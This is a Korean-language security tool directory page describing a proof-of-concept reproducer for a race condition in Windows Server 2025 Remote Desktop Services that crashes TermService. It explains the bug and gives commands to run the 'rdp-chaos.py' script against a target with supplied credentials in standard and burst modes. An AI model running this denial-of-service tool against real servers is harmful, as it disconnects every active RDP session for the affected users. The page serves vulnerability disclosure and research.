Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-50369 — CVE-2026-50369에 대한 PoC 재현 도구로, Windows Server 2025 RDS 세션 호스트의 rdpcorets.dll에서 발생하는 TOCTOU 경쟁 조건으로 인해 RDP 세션 연결 끊김을 통해 TermService DoS가 발생합니다. | Kitploit
도구/GitHubGitHub/mofarthim/cve-2026-50369
Vulnerability AnalysisExploitationPenetration TestingRed Teaming
GitHubmofarthim/cve-2026-50369

CVE-2026-50369

CVE-2026-50369에 대한 PoC 재현 도구로, Windows Server 2025 RDS 세션 호스트의 rdpcorets.dll에서 발생하는 TOCTOU 경쟁 조건으로 인해 RDP 세션 연결 끊김을 통해 TermService DoS가 발생합니다.

저장소 보기
212개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-50369

Windows Server 2025 RDS 세션 호스트에서 rdpcorets.dll!CRdpPipeGfxPlugin::Enable의 TOCTOU 경쟁 조건(race condition) 재현기입니다.

저는 이를 DoS로 신고했습니다. 해당 코드 경로는 어찌된 일인지 EoP까지도 가능하게 하는 것으로 보입니다. 이 재현기는 DoS 경로만을 위한 PoC입니다.

버그

Enable은 this+0x60에 있는 COM 인터페이스 포인터를 동기화 없이 두 번 읽습니다. TerminateInstance는 자체 임계 영역(critical section) 범위 밖에서 동일한 필드를 지웁니다. 두 함수 모두 PnP 장치 도착 및 제거 작업 항목을 통해 NT 스레드풀에서 동시에 실행됩니다. 두 번째 읽기가 null을 역참조 → 액세스 위반 → TermService 충돌 → 모든 활성 RDP 세션 연결 끊김.

root@kitploit:~
# install dependencies (Debian/Ubuntu)
sudo apt install -y freerdp3-x11 xvfb python3  # or freerdp2-x11

# create credentials file
echo -e "user1:pass1\nuser2:pass2\nuser3:pass3" > credentials.txt

# standard mode
python3 rdp-chaos.py --server <target> --creds credentials.txt

# burst mode (faster trigger)
python3 rdp-chaos.py --server <target> --creds credentials.txt \
    --burst --burst-count 16 --burst-kill-hold 0.1 --burst-race 0.030
도구 다운로드